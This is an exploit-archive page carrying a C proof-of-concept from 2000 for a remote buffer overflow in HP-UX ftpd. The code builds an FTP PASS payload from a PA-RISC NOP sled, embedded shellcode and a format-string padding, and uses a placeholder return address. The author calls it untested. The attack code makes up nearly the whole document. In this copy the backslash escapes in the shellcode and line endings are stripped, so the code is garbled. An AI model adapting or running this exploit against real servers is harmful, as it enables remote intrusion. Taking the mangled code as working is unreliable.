HP-UX FTPD Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : HP-UX FTPD Remote Buffer Overflow Exploit
# Published : 2000-12-01
# Author : venglin
# Previous Title : MS Windows (Jolt2.c) Denial of Service Exploit
# Next Title : HP-UX 11.00/10.20 crontab Overwrite Files Exploit

/* theoretical exploit for hpux ftpd vulnerability              */
/* not tested anywhere, needs tweaking                          */

/* (c) 2000 by babcia padlina ltd. <venglin@freebsd.lublin.pl>  */

#include <stdio.h>
#include <stdlib.h>

#define NOPS 100
#define BUFSIZE 1024

char shellcode[] =                       /*   HP-UX shellcode   */
  "x34x16x05x06x96xd6x05x34x20x20x08x01xe4x20xe0x08x0b"
  "x5ax02x9axe8x3fx1fxfdx08x21x02x80x34x02x01x02x08x41"
  "x04x02x60x40x01x62xb4x5ax01x54x0bx39x02x99x0bx18x02"
  "x98x34x16x04xbex20x20x08x01xe4x20xe0x08x96xd6x05x34"
  "xdexadxcaxfex2fx62x69x6ex2fx73x68";

char nop[] = "x08x21x02x80";                /*  PA-RISC NOP */

unsigned long ret = 0xdeadbeef;

int main(argc, argv)
int argc;
char **argv;
{
  int stackofs;
  char buf[BUFSIZ*2];
  int i;

  for (strcpy(buf, "PASS "),i=0;i<NOPS;i++) strcat(buf, nop);
  sprintf(buf+strlen(buf), "%s%%.%dd%c%c%c%c", shellcode,
    BUFSIZE-strlen(shellcode)-NOPS*4-4,
    ((int)ret & 0xff), (((int)ret & 0xff00) >> 8),
    (((int)ret & 0xff0000) >> 16),
    (((int)ret & 0xff000000) >> 24));
  printf("USER ftprn%srn", buf);

  exit(0);
}


// www.Syue.com [2000-12-01]